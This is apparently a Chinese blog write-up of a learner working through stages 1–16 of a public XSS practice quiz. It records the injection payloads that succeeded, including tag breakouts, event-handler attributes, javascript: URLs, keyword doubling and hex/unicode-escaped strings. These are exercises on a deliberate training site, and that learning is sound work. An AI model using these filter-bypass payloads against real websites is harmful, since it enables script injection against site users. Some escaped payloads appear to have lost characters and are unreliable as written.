XSS challenges 1-16

Posted 2021-02-18 coxq

看了一遍视频后自己再试一试，挠头

https://xss-quiz.int21h.jp/

Stage #1

输入1111

显示

 

 

 查看代码

 

 

 直接输入

<script>alert(document.domain);</script>

 

Stage #2

输入1111

查看代码，如图

 

 

 尝试闭合标签

1111 "><script>alert(document.domain)</script>

成功，并且代码显示为

 

 

Stage #3

输入1111

代码显示为

 

 

 尝试

"><script>alert(document.domain);</script>

显示

 

 

 考虑在Japan后进行闭合，打开Burpsuite，进行如图修改

 

 

 

p1=1111&p2=Japan >"<script>alert(document.domain)</script>

 成功

 

Stage #4

输入1111

 

 

 能发现有个hidden，抓包后能看到

 

则尝试在hackme后面添加”><script>alert(document.domain)</script>

 

 

 成功

 

Stage #5

输入1111

查看代码

 

 

 maxlength只有15，如果输入

"><script>alert(document.domain)</script>不够长

 如图

 

 

 则修改maxlength

 

 

 再次输入"><script>alert(document.domain)</script>

 

 

 成功

 

 

Stage #6

输入1111，查看代码

 

 

 尝试闭合，输入"><script>alert(document.domain)</script>

"、<、>都被转换

 

 

 尝试" onmouseover="alert(document.domain)

 

 

 成功，代码显示为

 

 

 

 

Stage #7

输入1111，查看代码

 

 

 尝试"><script>alert(document.domain)</script>

显示

 

 

 尝试" onmouseover="alert(document.domain)

显示

 

 

 观察代码，好像多了两个双引号，尝试onmouseover=alert(document.domain)

显示

 

 

 挠头，再试试"onmouseover=alert(document.domain)

 

 

 挠头

看看hint

Hint: nearly the same... but a bit more tricky.再看看代码

试试"       onmouseover=alert(document.domain)

行了

 

 

 

Stage #8

输入1111，查看代码

 

 

 和页面显示的

 

 

 尝试javascript:alert(document.domain)

点击产生的url

 

 

 成功

 

Stage #9

输入1111

 

 

 眼熟，嗯

先试试"><script>alert(document.domain)</script>

 

 

 果然不行，再试试"onmouseover=alert(document.domain)，还是不行

 

 

 再试试">,还是被变成了字符串的形式

 

 

 

再看看hint

Hint: UTF-7 XSS，挠头

跳过

在console里输入

 

 

 进入下一关

Stage #10

先输入1111，看代码

 

 

 好像比较正常，试试

"><script>alert(document.domain)</script>

 

 

 我的domain呢？？

试试双写

"><script>alert(document.domdomainain)</script>

ok了

Stage #11

输入1111

哟

 

 

 比较正常，试试"><script>alert(document.domain)</script>

 

 

 

 

 

 被转换了

再试试"onmouseover=alert(document.domain)

 

 

 onmouseover被过滤了

再试试"><a href="javascript:alert(documment.domain)">xss</a>

 

 

 

 

挠头，被转换了

试试&#10;将JavaScript分开

"><a href="javascr&#10;ipt:alert(document.domain);">xss<a>

 点击xss

成功

 

Stage #12

输入1111，查看代码

 

 挺正常的，试试"><script>alert(document.domain)</script>

 

 >,<都被消去了，看看hint试试将<,>转换成16进制

"x3ex3cscriptx3ealert(document.domain);x3c/scriptx3e

 

 挠头，试试

"x3ex3cscriptx3ealert(document.domain);x3c/scriptx3e

挠头，百度启动，要在IE浏览器中用``,

跳过

Stage #13

好像这个的操作别的浏览器不支持了，只有IE支持

跳过

Stage #14

挠头，跳过

Stage #15

输入1111，看代码

 

 

 

挠头，挺正常，试试"><script>alert(document.domain)</script>

 

 

挠头，试试转换<,>

"x3ex3cscriptx3ealert(document.domain);x3c/scriptx3e

 

 

再试试"x3ex3cscriptx3ealert(document.domain);x3c/scriptx3e

 

 

 ok

Stage #16

直接unicode转换

"u003eu003cscriptu003ealert(document.domain);u003c/scriptu003e

ok

 

• 添加到短语集
   
  • https://www.nationalgeographic.com/magazine/2020/01/scientists-are-unraveling-the-mysteries-of-pain-feature/
  • 创建新的单词集...
• 拷贝